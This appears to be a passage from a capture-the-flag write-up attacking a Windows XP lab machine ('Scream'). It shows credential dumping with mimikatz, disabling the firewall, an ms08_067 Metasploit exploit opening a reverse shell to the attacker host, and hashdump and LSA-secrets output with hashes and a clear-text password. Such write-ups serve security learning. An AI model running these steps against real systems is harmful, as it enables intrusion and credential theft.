avgtray.exe 1832 Console 0 9,316 K Running SCREAM\alex 0:00:00 N/A
FileZilla Server Interfac 1912 Console 0 3,740 K Running SCREAM\alex 0:00:00 FileZilla Server
TINY.EXE 1976 Console 0 3,316 K Running SCREAM\alex 0:00:00 N/A
avgwdsvc.exe 460 Console 0 2,056 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
FileZilla server.exe 488 Console 0 2,760 K Running NT AUTHORITY\SYSTEM 0:00:00 CAsyncSocketEx Helper Window
FreeSSHDService.exe 532 Console 0 4,304 K Running NT AUTHORITY\SYSTEM 0:00:00 FreeSSHDService
OpenTFTPServerMT.exe 116 Console 0 1,800 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
alg.exe 2240 Console 0 3,332 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
wscntfy.exe 2664 Console 0 1,848 K Running SCREAM\alex 0:00:00 N/A
wpabaln.exe 4040 Console 0 2,800 K Running SCREAM\alex 0:00:00 N/A
logon.scr 1056 Console 0 1,540 K Running SCREAM\alex 0:00:00 N/A
perl.exe 2940 Console 0 7,148 K Running SCREAM\alex 0:00:00 C:\strawberry\perl\bin\perl.exe
perl.exe 2964 Console 0 7,148 K Running SCREAM\alex 0:00:00 C:\strawberry\perl\bin\perl.exe
perl.exe 2560 Console 0 7,340 K Running SCREAM\alex 0:00:00 C:\strawberry\perl\bin\perl.exe - tasklist /v
ntvdm.exe 3560 Console 0 1,952 K Running SCREAM\alex 0:00:00 N/A
cmd.exe 3160 Console 0 2,600 K Running SCREAM\alex 0:00:00 N/A
tasklist.exe 4060 Console 0 4,292 K Running SCREAM\alex 0:00:00 OleMainThreadWndName
wmiprvse.exe 1948 Console 0 5,484 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
C:\>dir "C:\Program Files"
Volume in drive C has no label.
Volume Serial Number is 8080-53D6
Directory of C:\Program Files
04/03/2020 11:37 PM <DIR> .
04/03/2020 11:37 PM <DIR> ..
04/03/2020 11:36 PM <DIR> AVG
04/03/2020 11:33 PM <DIR> Common Files
04/03/2020 11:33 PM <DIR> ComPlus Applications
02/08/2013 11:31 PM <DIR> FileZilla Server
04/03/2020 11:36 PM <DIR> freeSSHd
04/03/2020 11:33 PM <DIR> Internet Explorer
04/03/2020 11:33 PM <DIR> Messenger
04/03/2020 11:34 PM <DIR> microsoft frontpage
04/03/2020 11:33 PM <DIR> Movie Maker
04/03/2020 11:33 PM <DIR> MSN
04/03/2020 11:33 PM <DIR> MSN Gaming Zone
04/03/2020 11:33 PM <DIR> NetMeeting
04/03/2020 11:35 PM <DIR> Online Services
04/03/2020 11:36 PM <DIR> OpenTFTPServer
04/03/2020 11:33 PM <DIR> Outlook Express
04/03/2020 11:34 PM <DIR> Windows Media Player
04/03/2020 11:33 PM <DIR> Windows NT
04/03/2020 11:34 PM <DIR> xerox
0 File(s) 0 bytes
20 Dir(s) 6,923,341,824 bytes free
-----------------------
=> I downloaded the last version of mimikatz from "http://blog.gentilkiwi.com/mimikatz" and upload it using the TFTP server
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> binary
tftp> put mimikatz.exe
Sent 1001224 bytes in 6.9 seconds
----------------------
=> Since I am logged as 'alex' who is administrator, I can elevate to SYSTEM using the mimkatz's command "token::elevate"
then I dumped the password hashes stored in the registry hive SAM using the mimkatz's command "lsadump::sam"
finally dumped the clear-text password of the current user 'alex' from memory (lsass) using the mimkatz's command "sekurlsa::logonpasswords"
C:\www\root>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #18362 Mar 8 2020 18:30:11
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
600 {0;000003e7} 0 - 23535 NT AUTHORITY\SYSTEM S-1-5-18 (03g,24p) Primary
-> Impersonated !
* Process Token : {0;000088d8} 0 - 10191035 SCREAM\alex S-1-5-21-602162358-507921405-854245398-1003 (08g,20p) Primary
* Thread Token : {0;000003e7} 0 - 10210010 NT AUTHORITY\SYSTEM S-1-5-18 (03g,24p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : SCREAM
SysKey : dfb6fe206786961793171f744aa18a28
Local SID : S-1-5-21-602162358-507921405-854245398
SAMKey : e93605754f745d400120bf02fbf900de
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : HelpAssistant
Hash LM : a03299a993da915ca9d82696d8625873
Hash NTLM: a8976221dea345e51ba030ddebc945b1
RID : 000003ea (1002)
User : SUPPORT_388945a0
Hash NTLM: 198b84b154680454ed6c56614542bf0e
RID : 000003eb (1003)
User : alex
Hash NTLM: 504182f8417ed8557b67e96adc8b4d04
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 35032 (00000000:000088d8)
Session : Interactive from 0
User Name : alex
Domain : SCREAM
Logon Server : SCREAM
Logon Time : 4/5/2020 3:02:09 AM
SID : S-1-5-21-602162358-507921405-854245398-1003
msv :
[00000002] Primary
* Username : alex
* Domain : SCREAM
* NTLM : 504182f8417ed8557b67e96adc8b4d04
* SHA1 : c84389be8e78f275c4530b00ba54aea1cbd347f7
wdigest :
* Username : alex
* Domain : SCREAM
* Password : thisisaverylongpassword
kerberos :
* Username : alex
* Domain : SCREAM
* Password : thisisaverylongpassword
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID : S-1-5-20
msv :
[00000002] Primary
* Username : SCREAM$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : SCREAM$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : SCREAM$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 26069 (00000000:000065d5)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID :
msv :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SCREAM$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID : S-1-5-18
msv :
wdigest :
kerberos :
* Username : scream$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz #
mimikatz # exit
Bye!
================== Other option to dump the clear-text password of the 'alex' account from memory ====================
=> Since our Perl reverse shell is running with local admin privileges (user 'alex'), I disabled the Firewall, and ran a known exploit (ms08067, ms17010) against this old Windows machine (XP)
to get a remote shell as SYSTEM. Finally I dumped the passwords using metasploit modules (e.g. hashdump and mimikatz)...
C:\Program Files>netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=DISABLE
Ok.
=> The port 445 and 139 are now open... :-)
jeff@kali-Linux:~$ nmap 192.168.1.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 06:43 CEST
Nmap scan report for 192.168.1.4
Host is up (0.085s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
msf5 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.34:4444
[*] 192.168.1.4:445 - Automatically detecting the target...
[*] 192.168.1.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.4:1079) at 2020-04-05 06:56:45 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a03299a993da915ca9d82696d8625873:a8976221dea345e51ba030ddebc945b1:::
pentester:1004:1e99d771a164613ab6cb882f20962373:fe4b8e9e7da90982005360caf7a5be78:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:198b84b154680454ed6c56614542bf0e:::
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/lsa_secrets
msf5 post(windows/gather/lsa_secrets) > set session 1
session => 1
msf5 post(windows/gather/lsa_secrets) > options
Module options (post/windows/gather/lsa_secrets):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
msf5 post(windows/gather/lsa_secrets) > run
[*] Executing module against SCREAM
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] XP or below system
[+] Key: 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantAccount
Decrypted Value: S_#4EkzDiiDIpk
[+] Key: 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantSID
Decrypted Value: D#CF2
[+] Key: DPAPI_SYSTEM
Decrypted Value: '#T`c$f.2UP
[+] Key: G${ED8F4747-E13D-47bc-856B-5CEFE1A81A7F}
Decrypted Value: .QOEz
[+] Key: L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75
Decrypted Value: RSA2H?LV&",V@MfWx}YQK'e`sm##.k;+Y/0+FX9.|>?z